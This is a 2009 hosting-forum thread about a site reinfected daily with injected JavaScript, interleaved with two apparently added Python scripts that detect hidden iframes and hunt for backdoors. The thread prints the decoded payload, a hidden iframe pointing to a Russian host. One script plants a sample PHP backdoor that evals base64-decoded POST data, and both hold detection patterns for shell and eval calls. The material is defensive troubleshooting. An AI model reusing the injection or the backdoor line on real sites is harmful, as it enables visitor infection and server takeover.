View Full Version : Hackers Using wysiwygpro_edit
tvcrazyman
05-11-2009, 12:27 PM
I've had a javascript virus added to all my index pages for like 4-5 days straight. It occurs around the same time every day. I just noticed this wysiwygpro_edit file and another one named something similar that I never put in there. After reading this http://forum.joomla.org/viewtopic.php?f=432&t=323240&view=previous I am convinced this is how the hackers are doing it to me. Deleted it of course.
Just thought I'd post this in case it is happening to anybody else. The file in question would probably be located right in the main folder of the site that is getting hacked.
Now to pray this doesn't happen again tomorrow.
Early Out
05-11-2009, 12:34 PM
Probably not. If you've ever hit the "HTML Editor" button in the File Manager, those files would appear on your account.
The hacking is probably coming from elsewhere. Make sure you've got the latest version of Joomla (1.5.10, I believe), and that you're not using any addons or plugins that might be providing an entry path for the bad guys.
tvcrazyman
05-11-2009, 12:53 PM
I actually have no idea what Joomla is, I found that Joomla forum by looking up the name of the suspicious file I found on Yahoo.
Even if it were the case that it went on there automatically, I think that wysiwyg file would be a great way for a hacker to install the javascript virus on all my index pages.
tvcrazyman
05-11-2009, 01:03 PM
Say have you ever heard of someone getting a virus javascript posted underneath their html code on all index pages about the same time every day before? Doesn't matter if it's php or html.
Early Out
05-11-2009, 02:00 PM
The key question is, what scripts are you running on your site? Not Joomla, OK, but how about Wordpress, or Drupal, or any other server-side process?
tvcrazyman
05-11-2009, 02:15 PM
Nope, none of that. Used to run Drupal a long time ago, but it's been deleted. The wysiwyg thing must have popped in because my wife said she used the file manager edit tool. Like you said, it pops in there automatically when you use it.
Thing is, I did some more research and there are security holes in wysiwyg editors, so hopefully getting rid of those two WYSIWYG files will keep the hacker off my site. I hope.
Nothing else on my site allows for someone to input data other than my message board.
Early Out
05-11-2009, 02:17 PM
Nothing else on my site allows for someone to input data other than my message board.
... which is? Sounds like the leading candidate, to me!
I know you've fixed on the wysiwyg editor file as a hacking path, but think about it: if the cPanel HTML Editor were a pathway for hackers, there would be thousands upon thousands of people (and not just BH customers) getting hacked. And that's not happening.
tvcrazyman
05-11-2009, 02:53 PM
Well I guess we'll see tomorrow between 1-1:30. That's when the hacker always attacks.
Main reason though I'm not leaning toward the message board is because it's not a very widely known script, and I've used it for years on several sites with no problems.
It just seems to me a program that actually edits any page you want on a site would be the logical choice of a hacker. But I guess we'll see. I'll try to come back tomorrow after 2 or so and tell you what happened.
tvcrazyman
05-11-2009, 03:43 PM
Well maybe that sorry sob is reading the board because he didn't wait till tomorrow. He did it to me again. The virus javascript is back.
Back to the drawing board I guess.
felgall
05-12-2009, 03:01 AM
It just seems to me a program that actually edits any page you want on a site would be the logical choice of a hacker.
Not if it is protected so that it can only be used by the site owner.
ALL web attacks come either through vulnerabilities in scripts running on your site or, if it is through something that only you are supposed to have access to, they get access by compromising your own computer with a keylogger so as to capture all your passwords.
tvcrazyman
05-12-2009, 12:15 PM
I found a binary translator, translated the crazy javascript the hacker has added, and it says
window.status='Done';document.write('<iframe name=4749f56 src=\'http://zctk.ru/liwe/?t=1?'+Math.round(Math.random()*155800)+'4646f11\' width=475 height=328 style=\'display: none\'></iframe>')
Now what can I do with this info to stop the hacker?
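The decoded payload above has a recognisable shape: an iframe hidden with display: none, written at runtime by document.write and appended underneath the page's own HTML. The following Python scanner is an added example, not something posted in the thread, that looks for exactly those three tell-tales in static pages so the owner can find every infected file at once rather than noticing them by hand. The infected sample page is constructed here from the decoded line quoted above; the clean sample, the rule names and the 600-character lookahead after document.write( are assumptions of this example.

```python
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

# Constructed sample page: a normal footer followed by an injected script of the
# same shape as the decoded payload quoted in the thread (a hidden iframe written
# with document.write, appended after the closing </html> tag).
SAMPLE_INFECTED = """<html><body>
<p>Welcome to my site</p>
<script src="/js/menu.js"></script>
</body></html>
<script>window.status='Done';document.write('<iframe name=4749f56 src=\\'http://zctk.ru/liwe/?t=1?'+Math.round(Math.random()*155800)+'4646f11\\' width=475 height=328 style=\\'display: none\\'></iframe>')</script>
"""

# Constructed clean page for comparison.
SAMPLE_CLEAN = """<html><body>
<p>Welcome to my site</p>
<script src="/js/menu.js"></script>
</body></html>
"""

# An iframe whose inline style hides it from the visitor.
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*display:\s*none[^>]*>", re.I)
# An iframe being written at runtime instead of appearing in the static markup.
DOCWRITE_IFRAME = re.compile(r"document\.write\(\s*['\"]\s*<iframe", re.I)
# The src URL inside either form; the decoded payload escapes its quotes with a backslash.
IFRAME_SRC = re.compile(r"src=\\?['\"]?(https?://[^'\"\\\s>]+)", re.I)


def _host(fragment: str):
    """Hostname of the first iframe src found in the fragment, or None."""
    m = IFRAME_SRC.search(fragment)
    return urlparse(m.group(1)).hostname if m else None


def scan_page(html: str) -> list:
    """Return (rule, host) pairs for every suspicious construct found in one page."""
    findings = []
    for m in HIDDEN_IFRAME.finditer(html):
        findings.append(("hidden_iframe", _host(m.group(0))))
    for m in DOCWRITE_IFRAME.finditer(html):
        # The URL follows within the same document.write(...) call.
        findings.append(("docwrite_iframe", _host(html[m.start():m.start() + 600])))
    # The thread describes the payload being appended underneath the page's own HTML.
    _, closed, tail = html.partition("</html>")
    if closed and re.search(r"<script|<iframe", tail, re.I):
        findings.append(("content_after_html_close", _host(tail)))
    return findings


def scan_tree(root: str, suffixes=(".html", ".htm", ".php")) -> dict:
    """Scan every page under root; returns {relative_path: findings} for pages with hits."""
    hits = {}
    base = Path(root)
    for path in sorted(base.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_page(path.read_text(errors="replace"))
            if found:
                hits[path.relative_to(base).as_posix()] = found
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for page, found in scan_tree(sys.argv[1]).items():
            print(page, found)
    else:
        print(scan_page(SAMPLE_INFECTED))
```

Run it against a local copy of the web root (python scan.py /path/to/webroot) after each daily reinfection; the list of hosts it extracts is what you would hand to the host's abuse desk, and the set of files it flags tells you which directories the attacker can write to, which narrows down which script is being abused.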
Early Out
05-12-2009, 01:48 PM
All that tells you is that it's some sort of Russian spam link. This doesn't give you any tools to stop the hacker.
All you can do to stop the hacker is to keep him from getting in. That means plugging the security hole in the script you're running and/or clear the infection from your own PC (less likely as the source, but if there's a keylogger running on your PC, for example, the hacker will know when you change your passwords).
tvcrazyman
05-13-2009, 07:24 AM
Well I changed my password last night over the phone, and did not use it on the computer. He still got in.
Today I've deleted all my scripts. What if he still gets in?
Early Out
05-13-2009, 07:28 AM
Today I've deleted all my scripts. What if he still gets in?
Call the Vatican to report a miracle. There are only two pathways to infection: a script with a security hole, or a compromised PC. If the site consists only of static HTML pages, and the PC isn't infected, there's no way for a hacker to get in.
For a site to get hacked, there has to be some sort of server-side processing going on (which doesn't happen with static HTML). Just make sure the hacker hasn't left himself some sort of backdoor, a script on your account that you're not aware of - you'll need to do some digging around.
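The "digging around" for a backdoor can be made systematic. The Python script below is an added example (not from the thread) that walks a web root and flags any file that the web server would execute but the owner never put there, any file changed within a recent window, and any script containing calls typical of dropped backdoors. The sample web root, the planted thumb.php file, the signature list and the 48-hour window are all constructed assumptions of this example; the owner's own inventory of scripts is passed in as known_scripts.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Extensions the web server would execute rather than serve as plain files.
SERVER_SIDE_EXT = {".php", ".php3", ".php5", ".phtml", ".cgi", ".pl", ".py", ".sh"}
# Calls that rarely belong in a small site's own scripts but are the bread and
# butter of dropped backdoors (hypothetical signature list for this example).
SUSPICIOUS_CODE = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13|passthru|shell_exec|system)\s*\(", re.I)


def build_sample_tree() -> Path:
    """Create a throwaway web root (constructed data) with one planted backdoor."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "board").mkdir()
    (root / "images").mkdir()
    legit = {
        root / "index.html": "<html><body>Welcome</body></html>\n",
        root / "board" / "post.cgi": "#!/usr/bin/perl\nprint \"ok\\n\";\n",
        root / "images" / "logo.gif": "GIF89a",
    }
    for path, text in legit.items():
        path.write_text(text)
    # Backdate the legitimate files so they fall outside the "recent" window.
    old = time.time() - 30 * 86400
    for path in legit:
        os.utime(path, (old, old))
    # Constructed stand-in for a backdoor: an obfuscated PHP file dropped into the
    # images folder, where no server-side script has any business being.
    (root / "images" / "thumb.php").write_text("<?php eval(base64_decode($_POST['c'])); ?>\n")
    return root


def hunt(root, known_scripts=(), recent_hours=48) -> list:
    """List files that look out of place, with the reason(s) each was flagged."""
    now = time.time()
    known = set(known_scripts)
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        reasons = []
        if path.suffix.lower() in SERVER_SIDE_EXT:
            if rel not in known:
                reasons.append("server-side script not in the owner's inventory")
            m = SUSPICIOUS_CODE.search(path.read_text(errors="replace"))
            if m:
                reasons.append(f"calls {m.group(1)}()")
        if now - path.stat().st_mtime < recent_hours * 3600:
            reasons.append(f"modified within the last {recent_hours}h")
        if reasons:
            findings.append({"path": rel, "reasons": reasons})
    return findings


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for hit in hunt(root, known_scripts=sys.argv[2:]):
        print(hit["path"], "->", "; ".join(hit["reasons"]))
```

Run it as python hunt.py /path/to/webroot board/post.cgi (listing every script you know you installed) and work through each hit; a script in an images or uploads folder, or one the owner cannot account for, is the backdoor the post above is talking about, and the mtime window ties a file to the daily reinfection time the thread describes.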
tvcrazyman
05-13-2009, 11:54 AM
I'm a Baptist, will a local preacher do, because they did it again.
felgall
05-13-2009, 01:27 PM
I'm a Baptist, will a local preacher do, because they did it again.
I doubt it is a miracle. If you really have made sure there are no scripts at all running on your site then your own computer must be compromised and when you changed your password a copy of the new password was sent directly from your computer to the person causing you all the problems.
tvcrazyman
05-13-2009, 02:58 PM
No, I called and had it changed and kept it from the computer.
But there are other scripts on other sites on the same account, but those sites were never touched that I saw.
Only thing left to do is move to another one of my accounts.
I do think eventually I will have all my sites completely static html pages if at all possible.
felgall
05-13-2009, 03:11 PM
But there are other scripts on other sites on the same account
So the security hole is on one of those scripts then. Just the person is being slightly clever by not trashing the site the script is running on but instead updating other sites on the same account. By doing that they are trying to make it harder for you to figure out which script it is that has the security hole.